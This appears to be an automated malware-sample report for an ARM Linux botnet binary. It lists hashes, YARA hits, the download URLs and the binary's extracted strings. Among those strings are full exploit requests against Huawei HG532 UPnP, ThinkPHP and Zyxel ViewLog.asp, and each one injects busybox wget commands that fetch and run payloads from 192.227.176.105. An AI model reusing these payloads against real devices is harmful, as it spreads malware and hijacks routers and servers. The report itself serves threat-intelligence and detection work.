Sample details: 73c2158676e8293bd218607493879790 --

Hashes
MD5: 73c2158676e8293bd218607493879790
SHA1: 9a8256a41b7560a0316af5e909729d06614db634
SHA256: 63b1df91c98d7615f960f1445df234d2beee25cad0748a6670c9e98f4b994d87
SSDEEP: 1536:2NnxhBEKdtwOcjrqSzRn+uC1kKgYrGWVti7fnmXp6C1U9Pwh95ymI518scFpIpi4:SBPdiOerxzZ+l1kHYaoti7fmXMCqy3Mg
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Big_Numbers1 |
Source
http://192.227.176.105:80/bins/UnHAnaAW.arm6
http://192.227.176.105/bins/UnHAnaAW.arm6
Strings
		POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.227.176.105 -l /tmp/binary -r /bins/UnHAnaAW.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Selfrep.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
192.227.176.105
<!: acam
 18:1 
0125!8 
$5''#;&0
'!$$;& 
?;d509=:
:217 10t
'<188T
1:5681T
'-' 19T
{6=:{6!'-6;,t
nt5$$81 t:; t2;!:0T
:7;&&17 T
{6=:{6!'-6;,t$'T
{6=:{6!'-6;,t?=88tymtT
{$&;7{T
{95$'T
{$&;7{:1 { 7$T
{' 5 !'T
z5:=91T
{$&;7{:1 {&;! 1T
5''#;&0T
{1 7{&1';8"z7;:2T
:591'1&"1&tT
{01"{#5 7<0;3T
{01"{9='7{#5 7<0;3T
$662*7!E
1: 1&T
e365`70;9ag:<$ef1=d?2>T
;!&71t
:3=:1t
GET /index.php?s=/index/	hink
pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://192.227.176.105/bins/UnHAnaAW.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
 /bin/busybox wget http://192.227.176.105/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
/proc/stat
/proc/cpuinfo
processor
/sys/devices/system/cpu
/dev/null
.shstrtab
.rodata
.init_array
.fini_array
.ARM.attributes